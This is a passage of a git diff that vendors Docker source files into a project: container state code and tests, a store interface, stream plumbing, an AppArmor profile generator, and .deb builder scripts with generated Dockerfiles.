diff --git a/vendor/github.com/docker/docker/container/state_solaris.go b/vendor/github.com/docker/docker/container/state_solaris.go
new file mode 100644
index 0000000000..1229650efa
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/state_solaris.go
@@ -0,0 +1,7 @@
+package container
+
+// setFromExitStatus is a platform specific helper function to set the state
+// based on the ExitStatus structure.
+func (s *State) setFromExitStatus(exitStatus *ExitStatus) {
+	s.ExitCodeValue = exitStatus.ExitCode
+}
diff --git a/vendor/github.com/docker/docker/container/state_test.go b/vendor/github.com/docker/docker/container/state_test.go
new file mode 100644
index 0000000000..c9a7bb4b7b
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/state_test.go
@@ -0,0 +1,113 @@
+package container
+
+import (
+	"sync/atomic"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+)
+
+func TestIsValidHealthString(t *testing.T) {
+	contexts := []struct {
+		Health   string
+		Expected bool
+	}{
+		{types.Healthy, true},
+		{types.Unhealthy, true},
+		{types.Starting, true},
+		{types.NoHealthcheck, true},
+		{"fail", false},
+	}
+
+	for _, c := range contexts {
+		v := IsValidHealthString(c.Health)
+		if v != c.Expected {
+			t.Fatalf("Expected %t, but got %t", c.Expected, v)
+		}
+	}
+}
+
+func TestStateRunStop(t *testing.T) {
+	s := NewState()
+	for i := 1; i < 3; i++ { // full lifecycle two times
+		s.Lock()
+		s.SetRunning(i+100, false)
+		s.Unlock()
+
+		if !s.IsRunning() {
+			t.Fatal("State not running")
+		}
+		if s.Pid != i+100 {
+			t.Fatalf("Pid %v, expected %v", s.Pid, i+100)
+		}
+		if s.ExitCode() != 0 {
+			t.Fatalf("ExitCode %v, expected 0", s.ExitCode())
+		}
+
+		stopped := make(chan struct{})
+		var exit int64
+		go func() {
+			exitCode, _ := s.WaitStop(-1 * time.Second)
+			atomic.StoreInt64(&exit, int64(exitCode))
+			close(stopped)
+		}()
+		s.Lock()
+		s.SetStopped(&ExitStatus{ExitCode: i})
+		s.Unlock()
+		if s.IsRunning() {
+			t.Fatal("State is running")
+		}
+		if s.ExitCode() != i {
+			t.Fatalf("ExitCode %v, expected %v", s.ExitCode(), i)
+		}
+		if s.Pid != 0 {
+			t.Fatalf("Pid %v, expected 0", s.Pid)
+		}
+		select {
+		case <-time.After(100 * time.Millisecond):
+			t.Fatal("Stop callback doesn't fire in 100 milliseconds")
+		case <-stopped:
+			t.Log("Stop callback fired")
+		}
+		exitCode := int(atomic.LoadInt64(&exit))
+		if exitCode != i {
+			t.Fatalf("ExitCode %v, expected %v", exitCode, i)
+		}
+		if exitCode, err := s.WaitStop(-1 * time.Second); err != nil || exitCode != i {
+			t.Fatalf("WaitStop returned exitCode: %v, err: %v, expected exitCode: %v, err: %v", exitCode, err, i, nil)
+		}
+	}
+}
+
+func TestStateTimeoutWait(t *testing.T) {
+	s := NewState()
+	stopped := make(chan struct{})
+	go func() {
+		s.WaitStop(100 * time.Millisecond)
+		close(stopped)
+	}()
+	select {
+	case <-time.After(200 * time.Millisecond):
+		t.Fatal("Stop callback doesn't fire in 200 milliseconds")
+	case <-stopped:
+		t.Log("Stop callback fired")
+	}
+
+	s.Lock()
+	s.SetStopped(&ExitStatus{ExitCode: 1})
+	s.Unlock()
+
+	stopped = make(chan struct{})
+	go func() {
+		s.WaitStop(100 * time.Millisecond)
+		close(stopped)
+	}()
+	select {
+	case <-time.After(200 * time.Millisecond):
+		t.Fatal("Stop callback doesn't fire in 100 milliseconds")
+	case <-stopped:
+		t.Log("Stop callback fired")
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/container/state_unix.go b/vendor/github.com/docker/docker/container/state_unix.go
new file mode 100644
index 0000000000..a2fa5afc28
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/state_unix.go
@@ -0,0 +1,10 @@
+// +build linux freebsd
+
+package container
+
+// setFromExitStatus is a platform specific helper function to set the state
+// based on the ExitStatus structure.
+func (s *State) setFromExitStatus(exitStatus *ExitStatus) {
+	s.ExitCodeValue = exitStatus.ExitCode
+	s.OOMKilled = exitStatus.OOMKilled
+}
diff --git a/vendor/github.com/docker/docker/container/state_windows.go b/vendor/github.com/docker/docker/container/state_windows.go
new file mode 100644
index 0000000000..1229650efa
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/state_windows.go
@@ -0,0 +1,7 @@
+package container
+
+// setFromExitStatus is a platform specific helper function to set the state
+// based on the ExitStatus structure.
+func (s *State) setFromExitStatus(exitStatus *ExitStatus) {
+	s.ExitCodeValue = exitStatus.ExitCode
+}
diff --git a/vendor/github.com/docker/docker/container/store.go b/vendor/github.com/docker/docker/container/store.go
new file mode 100644
index 0000000000..042fb1a349
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/store.go
@@ -0,0 +1,28 @@
+package container
+
+// StoreFilter defines a function to filter
+// container in the store.
+type StoreFilter func(*Container) bool
+
+// StoreReducer defines a function to
+// manipulate containers in the store
+type StoreReducer func(*Container)
+
+// Store defines an interface that
+// any container store must implement.
+type Store interface {
+	// Add appends a new container to the store.
+	Add(string, *Container)
+	// Get returns a container from the store by the identifier it was stored with.
+	Get(string) *Container
+	// Delete removes a container from the store by the identifier it was stored with.
+	Delete(string)
+	// List returns a list of containers from the store.
+	List() []*Container
+	// Size returns the number of containers in the store.
+	Size() int
+	// First returns the first container found in the store by a given filter.
+	First(StoreFilter) *Container
+	// ApplyAll calls the reducer function with every container in the store.
+	ApplyAll(StoreReducer)
+}
diff --git a/vendor/github.com/docker/docker/container/stream/streams.go b/vendor/github.com/docker/docker/container/stream/streams.go
new file mode 100644
index 0000000000..79f366afda
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/stream/streams.go
@@ -0,0 +1,143 @@
+package stream
+
+import (
+	"fmt"
+	"io"
+	"io/ioutil"
+	"strings"
+	"sync"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/libcontainerd"
+	"github.com/docker/docker/pkg/broadcaster"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/pools"
+)
+
+// Config holds information about I/O streams managed together.
+//
+// config.StdinPipe returns a WriteCloser which can be used to feed data
+// to the standard input of the streamConfig's active process.
+// config.StdoutPipe and streamConfig.StderrPipe each return a ReadCloser
+// which can be used to retrieve the standard output (and error) generated
+// by the container's active process. The output (and error) are actually
+// copied and delivered to all StdoutPipe and StderrPipe consumers, using
+// a kind of "broadcaster".
+type Config struct {
+	sync.WaitGroup
+	stdout    *broadcaster.Unbuffered
+	stderr    *broadcaster.Unbuffered
+	stdin     io.ReadCloser
+	stdinPipe io.WriteCloser
+}
+
+// NewConfig creates a stream config and initializes
+// the standard err and standard out to new unbuffered broadcasters.
+func NewConfig() *Config {
+	return &Config{
+		stderr: new(broadcaster.Unbuffered),
+		stdout: new(broadcaster.Unbuffered),
+	}
+}
+
+// Stdout returns the standard output in the configuration.
+func (c *Config) Stdout() *broadcaster.Unbuffered {
+	return c.stdout
+}
+
+// Stderr returns the standard error in the configuration.
+func (c *Config) Stderr() *broadcaster.Unbuffered {
+	return c.stderr
+}
+
+// Stdin returns the standard input in the configuration.
+func (c *Config) Stdin() io.ReadCloser {
+	return c.stdin
+}
+
+// StdinPipe returns an input writer pipe as an io.WriteCloser.
+func (c *Config) StdinPipe() io.WriteCloser {
+	return c.stdinPipe
+}
+
+// StdoutPipe creates a new io.ReadCloser with an empty bytes pipe.
+// It adds this new out pipe to the Stdout broadcaster.
+func (c *Config) StdoutPipe() io.ReadCloser {
+	bytesPipe := ioutils.NewBytesPipe()
+	c.stdout.Add(bytesPipe)
+	return bytesPipe
+}
+
+// StderrPipe creates a new io.ReadCloser with an empty bytes pipe.
+// It adds this new err pipe to the Stderr broadcaster.
+func (c *Config) StderrPipe() io.ReadCloser {
+	bytesPipe := ioutils.NewBytesPipe()
+	c.stderr.Add(bytesPipe)
+	return bytesPipe
+}
+
+// NewInputPipes creates new pipes for both standard inputs, Stdin and StdinPipe.
+func (c *Config) NewInputPipes() {
+	c.stdin, c.stdinPipe = io.Pipe()
+}
+
+// NewNopInputPipe creates a new input pipe that will silently drop all messages in the input.
+func (c *Config) NewNopInputPipe() {
+	c.stdinPipe = ioutils.NopWriteCloser(ioutil.Discard)
+}
+
+// CloseStreams ensures that the configured streams are properly closed.
+func (c *Config) CloseStreams() error {
+	var errors []string
+
+	if c.stdin != nil {
+		if err := c.stdin.Close(); err != nil {
+			errors = append(errors, fmt.Sprintf("error close stdin: %s", err))
+		}
+	}
+
+	if err := c.stdout.Clean(); err != nil {
+		errors = append(errors, fmt.Sprintf("error close stdout: %s", err))
+	}
+
+	if err := c.stderr.Clean(); err != nil {
+		errors = append(errors, fmt.Sprintf("error close stderr: %s", err))
+	}
+
+	if len(errors) > 0 {
+		return fmt.Errorf(strings.Join(errors, "\n"))
+	}
+
+	return nil
+}
+
+// CopyToPipe connects streamconfig with a libcontainerd.IOPipe
+func (c *Config) CopyToPipe(iop libcontainerd.IOPipe) {
+	copyFunc := func(w io.Writer, r io.Reader) {
+		c.Add(1)
+		go func() {
+			if _, err := pools.Copy(w, r); err != nil {
+				logrus.Errorf("stream copy error: %+v", err)
+			}
+			c.Done()
+		}()
+	}
+
+	if iop.Stdout != nil {
+		copyFunc(c.Stdout(), iop.Stdout)
+	}
+	if iop.Stderr != nil {
+		copyFunc(c.Stderr(), iop.Stderr)
+	}
+
+	if stdin := c.Stdin(); stdin != nil {
+		if iop.Stdin != nil {
+			go func() {
+				pools.Copy(iop.Stdin, stdin)
+				if err := iop.Stdin.Close(); err != nil {
+					logrus.Warnf("failed to close stdin: %+v", err)
+				}
+			}()
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/contrib/README.md b/vendor/github.com/docker/docker/contrib/README.md
new file mode 100644
index 0000000000..92b1d94433
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/README.md
@@ -0,0 +1,4 @@
+The `contrib` directory contains scripts, images, and other helpful things
+which are not part of the core docker distribution. Please note that they
+could be out of date, since they do not receive the same attention as the
+rest of the repository.
diff --git a/vendor/github.com/docker/docker/contrib/REVIEWERS b/vendor/github.com/docker/docker/contrib/REVIEWERS
new file mode 100644
index 0000000000..18e05a3070
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/REVIEWERS
@@ -0,0 +1 @@
+Tianon Gravi <admwiggin@gmail.com> (@tianon)
diff --git a/vendor/github.com/docker/docker/contrib/apparmor/main.go b/vendor/github.com/docker/docker/contrib/apparmor/main.go
new file mode 100644
index 0000000000..f4a2978b86
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/apparmor/main.go
@@ -0,0 +1,56 @@
+package main
+
+import (
+	"fmt"
+	"log"
+	"os"
+	"path"
+	"text/template"
+
+	"github.com/docker/docker/pkg/aaparser"
+)
+
+type profileData struct {
+	Version int
+}
+
+func main() {
+	if len(os.Args) < 2 {
+		log.Fatal("pass a filename to save the profile in.")
+	}
+
+	// parse the arg
+	apparmorProfilePath := os.Args[1]
+
+	version, err := aaparser.GetVersion()
+	if err != nil {
+		log.Fatal(err)
+	}
+	data := profileData{
+		Version: version,
+	}
+	fmt.Printf("apparmor_parser is of version %+v\n", data)
+
+	// parse the template
+	compiled, err := template.New("apparmor_profile").Parse(dockerProfileTemplate)
+	if err != nil {
+		log.Fatalf("parsing template failed: %v", err)
+	}
+
+	// make sure /etc/apparmor.d exists
+	if err := os.MkdirAll(path.Dir(apparmorProfilePath), 0755); err != nil {
+		log.Fatal(err)
+	}
+
+	f, err := os.OpenFile(apparmorProfilePath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0644)
+	if err != nil {
+		log.Fatal(err)
+	}
+	defer f.Close()
+
+	if err := compiled.Execute(f, data); err != nil {
+		log.Fatalf("executing template failed: %v", err)
+	}
+
+	fmt.Printf("created apparmor profile for version %+v at %q\n", data, apparmorProfilePath)
+}
diff --git a/vendor/github.com/docker/docker/contrib/apparmor/template.go b/vendor/github.com/docker/docker/contrib/apparmor/template.go
new file mode 100644
index 0000000000..e5e1c8bed6
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/apparmor/template.go
@@ -0,0 +1,268 @@
+package main
+
+const dockerProfileTemplate = `@{DOCKER_GRAPH_PATH}=/var/lib/docker
+
+profile /usr/bin/docker (attach_disconnected, complain) {
+  # Prevent following links to these files during container setup.
+  deny /etc/** mkl,
+  deny /dev/** kl,
+  deny /sys/** mkl,
+  deny /proc/** mkl,
+
+  mount -> @{DOCKER_GRAPH_PATH}/**,
+  mount -> /,
+  mount -> /proc/**,
+  mount -> /sys/**,
+  mount -> /run/docker/netns/**,
+  mount -> /.pivot_root[0-9]*/,
+
+  / r,
+
+  umount,
+  pivot_root,
+{{if ge .Version 209000}}
+  signal (receive) peer=@{profile_name},
+  signal (receive) peer=unconfined,
+  signal (send),
+{{end}}
+  network,
+  capability,
+  owner /** rw,
+  @{DOCKER_GRAPH_PATH}/** rwl,
+  @{DOCKER_GRAPH_PATH}/linkgraph.db k,
+  @{DOCKER_GRAPH_PATH}/network/files/boltdb.db k,
+  @{DOCKER_GRAPH_PATH}/network/files/local-kv.db k,
+  @{DOCKER_GRAPH_PATH}/[0-9]*.[0-9]*/linkgraph.db k,
+
+  # For non-root client use:
+  /dev/urandom r,
+  /dev/null rw,
+  /dev/pts/[0-9]* rw,
+  /run/docker.sock rw,
+  /proc/** r,
+  /proc/[0-9]*/attr/exec w,
+  /sys/kernel/mm/hugepages/ r,
+  /etc/localtime r,
+  /etc/ld.so.cache r,
+  /etc/passwd r,
+
+{{if ge .Version 209000}}
+  ptrace peer=@{profile_name},
+  ptrace (read) peer=docker-default,
+  deny ptrace (trace) peer=docker-default,
+  deny ptrace peer=/usr/bin/docker///bin/ps,
+{{end}}
+
+  /usr/lib/** rm,
+  /lib/** rm,
+
+  /usr/bin/docker pix,
+  /sbin/xtables-multi rCx,
+  /sbin/iptables rCx,
+  /sbin/modprobe rCx,
+  /sbin/auplink rCx,
+  /sbin/mke2fs rCx,
+  /sbin/tune2fs rCx,
+  /sbin/blkid rCx,
+  /bin/kmod rCx,
+  /usr/bin/xz rCx,
+  /bin/ps rCx,
+  /bin/tar rCx,
+  /bin/cat rCx,
+  /sbin/zfs rCx,
+  /sbin/apparmor_parser rCx,
+
+{{if ge .Version 209000}}
+  # Transitions
+  change_profile -> docker-*,
+  change_profile -> unconfined,
+{{end}}
+
+  profile /bin/cat (complain) {
+    /etc/ld.so.cache r,
+    /lib/** rm,
+    /dev/null rw,
+    /proc r,
+    /bin/cat mr,
+
+    # For reading in 'docker stats':
+    /proc/[0-9]*/net/dev r,
+  }
+  profile /bin/ps (complain) {
+    /etc/ld.so.cache r,
+    /etc/localtime r,
+    /etc/passwd r,
+    /etc/nsswitch.conf r,
+    /lib/** rm,
+    /proc/[0-9]*/** r,
+    /dev/null rw,
+    /bin/ps mr,
+
+{{if ge .Version 209000}}
+    # We don't need ptrace so we'll deny and ignore the error.
+    deny ptrace (read, trace),
+{{end}}
+
+    # Quiet dac_override denials
+    deny capability dac_override,
+    deny capability dac_read_search,
+    deny capability sys_ptrace,
+
+    /dev/tty r,
+    /proc/stat r,
+    /proc/cpuinfo r,
+    /proc/meminfo r,
+    /proc/uptime r,
+    /sys/devices/system/cpu/online r,
+    /proc/sys/kernel/pid_max r,
+    /proc/ r,
+    /proc/tty/drivers r,
+  }
+  profile /sbin/iptables (complain) {
+{{if ge .Version 209000}}
+    signal (receive) peer=/usr/bin/docker,
+{{end}}
+    capability net_admin,
+  }
+  profile /sbin/auplink flags=(attach_disconnected, complain) {
+{{if ge .Version 209000}}
+    signal (receive) peer=/usr/bin/docker,
+{{end}}
+    capability sys_admin,
+    capability dac_override,
+
+    @{DOCKER_GRAPH_PATH}/aufs/** rw,
+    @{DOCKER_GRAPH_PATH}/tmp/** rw,
+    # For user namespaces:
+    @{DOCKER_GRAPH_PATH}/[0-9]*.[0-9]*/** rw,
+
+    /sys/fs/aufs/** r,
+    /lib/** rm,
+    /apparmor/.null r,
+    /dev/null rw,
+    /etc/ld.so.cache r,
+    /sbin/auplink rm,
+    /proc/fs/aufs/** rw,
+    /proc/[0-9]*/mounts rw,
+  }
+  profile /sbin/modprobe /bin/kmod (complain) {
+{{if ge .Version 209000}}
+    signal (receive) peer=/usr/bin/docker,
+{{end}}
+    capability sys_module,
+    /etc/ld.so.cache r,
+    /lib/** rm,
+    /dev/null rw,
+    /apparmor/.null rw,
+    /sbin/modprobe rm,
+    /bin/kmod rm,
+    /proc/cmdline r,
+    /sys/module/** r,
+    /etc/modprobe.d{/,/**} r,
+  }
+  # xz works via pipes, so we do not need access to the filesystem.
+  profile /usr/bin/xz (complain) {
+{{if ge .Version 209000}}
+    signal (receive) peer=/usr/bin/docker,
+{{end}}
+    /etc/ld.so.cache r,
+    /lib/** rm,
+    /usr/bin/xz rm,
+    deny /proc/** rw,
+    deny /sys/** rw,
+  }
+  profile /sbin/xtables-multi (attach_disconnected, complain) {
+    /etc/ld.so.cache r,
+    /lib/** rm,
+    /sbin/xtables-multi rm,
+    /apparmor/.null w,
+    /dev/null rw,
+
+    /proc r,
+
+    capability net_raw,
+    capability net_admin,
+    network raw,
+  }
+  profile /sbin/zfs (attach_disconnected, complain) {
+    file,
+    capability,
+  }
+  profile /sbin/mke2fs (complain) {
+    /sbin/mke2fs rm,
+
+    /lib/** rm,
+
+    /apparmor/.null w,
+
+    /etc/ld.so.cache r,
+    /etc/mke2fs.conf r,
+    /etc/mtab r,
+
+    /dev/dm-* rw,
+    /dev/urandom r,
+    /dev/null rw,
+
+    /proc/swaps r,
+    /proc/[0-9]*/mounts r,
+  }
+  profile /sbin/tune2fs (complain) {
+    /sbin/tune2fs rm,
+
+    /lib/** rm,
+
+    /apparmor/.null w,
+
+    /etc/blkid.conf r,
+    /etc/mtab r,
+    /etc/ld.so.cache r,
+
+    /dev/null rw,
+    /dev/.blkid.tab r,
+    /dev/dm-* rw,
+
+    /proc/swaps r,
+    /proc/[0-9]*/mounts r,
+  }
+  profile /sbin/blkid (complain) {
+    /sbin/blkid rm,
+
+    /lib/** rm,
+    /apparmor/.null w,
+
+    /etc/ld.so.cache r,
+    /etc/blkid.conf r,
+
+    /dev/null rw,
+    /dev/.blkid.tab rl,
+    /dev/.blkid.tab* rwl,
+    /dev/dm-* r,
+
+    /sys/devices/virtual/block/** r,
+
+    capability mknod,
+
+    mount -> @{DOCKER_GRAPH_PATH}/**,
+  }
+  profile /sbin/apparmor_parser (complain) {
+    /sbin/apparmor_parser rm,
+
+    /lib/** rm,
+
+    /etc/ld.so.cache r,
+    /etc/apparmor/** r,
+    /etc/apparmor.d/** r,
+    /etc/apparmor.d/cache/** w,
+
+    /dev/null rw,
+
+    /sys/kernel/security/apparmor/** r,
+    /sys/kernel/security/apparmor/.replace w,
+
+    /proc/[0-9]*/mounts r,
+    /proc/sys/kernel/osrelease r,
+    /proc r,
+
+    capability mac_admin,
+  }
+}`
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh
new file mode 100755
index 0000000000..8271d9dc47
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh
@@ -0,0 +1,10 @@
+#!/bin/bash
+set -e
+
+cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
+
+set -x
+./generate.sh
+for d in */; do
+	docker build -t "dockercore/builder-deb:$(basename "$d")" "$d"
+done
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh
new file mode 100755
index 0000000000..b5040b709a
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh
@@ -0,0 +1,118 @@
+#!/bin/bash
+set -e
+
+# This file is used to auto-generate Dockerfiles for making debs via 'make deb'
+#
+# usage: ./generate.sh [versions]
+#    ie: ./generate.sh
+#        to update all Dockerfiles in this directory
+#    or: ./generate.sh ubuntu-trusty
+#        to only update ubuntu-trusty/Dockerfile
+#    or: ./generate.sh ubuntu-newversion
+#        to create a new folder and a Dockerfile within it
+#
+# Note: non-LTS versions are not guaranteed to work.
+
+cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
+
+versions=( "$@" )
+if [ ${#versions[@]} -eq 0 ]; then
+	versions=( */ )
+fi
+versions=( "${versions[@]%/}" )
+
+for version in "${versions[@]}"; do
+	echo "${versions[@]}"
+	distro="${version%-*}"
+	suite="${version##*-}"
+	from="aarch64/${distro}:${suite}"
+
+	mkdir -p "$version"
+	echo "$version -> FROM $from"
+	cat > "$version/Dockerfile" <<-EOF
+		#
+		# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/aarch64/generate.sh"!
+		#
+
+		FROM $from
+
+	EOF
+
+	dockerBuildTags='apparmor pkcs11 selinux'
+	runcBuildTags='apparmor selinux'
+
+	# this list is sorted alphabetically; please keep it that way
+	packages=(
+		apparmor # for apparmor_parser for testing the profile
+		bash-completion # for bash-completion debhelper integration
+		btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible)
+		build-essential # "essential for building Debian packages"
+		cmake # tini dep
+		curl ca-certificates # for downloading Go
+		debhelper # for easy ".deb" building
+		dh-apparmor # for apparmor debhelper
+		dh-systemd # for systemd debhelper integration
+		git # for "git commit" info in "docker -v"
+		libapparmor-dev # for "sys/apparmor.h"
+		libdevmapper-dev # for "libdevmapper.h"
+		libltdl-dev # for pkcs11 "ltdl.h"
+		libsqlite3-dev # for "sqlite3.h"
+		pkg-config # for detecting things like libsystemd-journal dynamically
+		vim-common # tini dep
+	)
+
+	case "$suite" in
+		trusty)
+			packages+=( libsystemd-journal-dev )
+			# aarch64 doesn't have an official downloadable binary for go.
+			# And gccgo for trusty only includes Go 1.2 implementation which
+			# is too old to build current go source, fortunately trusty has
+			# golang-1.6-go package can be used as bootstrap.
+			packages+=( golang-1.6-go )
+			;;
+		xenial)
+			packages+=( libsystemd-dev )
+			packages+=( golang-go libseccomp-dev)
+
+			dockerBuildTags="$dockerBuildTags seccomp"
+			runcBuildTags="$runcBuildTags seccomp"
+			;;
+		*)
+			echo "Unsupported distro:" $distro:$suite
+			rm -fr "$version"
+			exit 1
+			;;
+	esac
+
+	# update and install packages
+	echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile"
+	echo >> "$version/Dockerfile"
+
+	case "$suite" in
+		trusty)
+			echo 'RUN update-alternatives --install /usr/bin/go go /usr/lib/go-1.6/bin/go 100' >> "$version/Dockerfile"
+			echo >> "$version/Dockerfile"
+			;;
+		*)
+			;;
+	esac
+
+	echo "# Install Go" >> "$version/Dockerfile"
+	echo "# aarch64 doesn't have official go binaries, so use the version of go installed from" >> "$version/Dockerfile"
+	echo "# the image to build go from source." >> "$version/Dockerfile"
+
+	awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile.aarch64 >> "$version/Dockerfile"
+	echo 'RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \' >> "$version/Dockerfile"
+	echo '	&& cd /usr/src/go/src \' >> "$version/Dockerfile"
+	echo '	&& GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash' >> "$version/Dockerfile"
+	echo >> "$version/Dockerfile"
+
+	echo 'ENV PATH $PATH:/usr/src/go/bin' >> "$version/Dockerfile"
+	echo >> "$version/Dockerfile"
+
+	echo "ENV AUTO_GOPATH 1" >> "$version/Dockerfile"
+	echo >> "$version/Dockerfile"
+
+	echo "ENV DOCKER_BUILDTAGS $dockerBuildTags" >> "$version/Dockerfile"
+	echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile"
+done
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile
new file mode 100644
index 0000000000..d04860ccd7
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile
@@ -0,0 +1,24 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/aarch64/generate.sh"!
+#
+
+FROM aarch64/ubuntu:trusty
+
+RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev golang-1.6-go --no-install-recommends && rm -rf /var/lib/apt/lists/*
+
+RUN update-alternatives --install /usr/bin/go go /usr/lib/go-1.6/bin/go 100
+
+# Install Go
+# aarch64 doesn't have official go binaries, so use the version of go installed from
+# the image to build go from source.
+ENV GO_VERSION 1.7.5
+RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \
+	&& cd /usr/src/go/src \
+	&& GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash
+
+ENV PATH $PATH:/usr/src/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux
+ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile
new file mode 100644
index 0000000000..3cd8442eca
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile
@@ -0,0 +1,22 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/aarch64/generate.sh"!
+#
+
+FROM aarch64/ubuntu:xenial
+
+RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-dev golang-go libseccomp-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
+
+# Install Go
+# aarch64 doesn't have official go binaries, so use the version of go installed from
+# the image to build go from source.
+ENV GO_VERSION 1.7.5
+RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \
+	&& cd /usr/src/go/src \
+	&& GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash
+
+ENV PATH $PATH:/usr/src/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux seccomp
+ENV RUNC_BUILDTAGS apparmor selinux seccomp
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md
new file mode 100644
index 0000000000..20a0ff1006
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md
@@ -0,0 +1,5 @@
+# `dockercore/builder-deb`
+
+This image's tags contain the dependencies for building Docker `.deb`s for each of the Debian-based platforms Docker targets.
+
+To add new tags, see [`contrib/builder/deb/amd64` in https://github.com/docker/docker](https://github.com/docker/docker/tree/master/contrib/builder/deb/amd64), specifically the `generate.sh` script, whose usage is described in a comment at the top of the file.
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh
new file mode 100755
index 0000000000..8271d9dc47
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh
@@ -0,0 +1,10 @@
+#!/bin/bash
+set -e
+
+cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
+
+set -x
+./generate.sh
+for d in */; do
+	docker build -t "dockercore/builder-deb:$(basename "$d")" "$d"
+done
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile
new file mode 100644
index 0000000000..42aaa56c01
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile
@@ -0,0 +1,20 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"!
+#
+
+FROM debian:jessie
+
+# allow replacing httpredir or deb mirror
+ARG APT_MIRROR=deb.debian.org
+RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
+
+RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev  libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
+
+ENV GO_VERSION 1.7.5
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux
+ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile
new file mode 100644
index 0000000000..c052be56ce
--- /dev/null
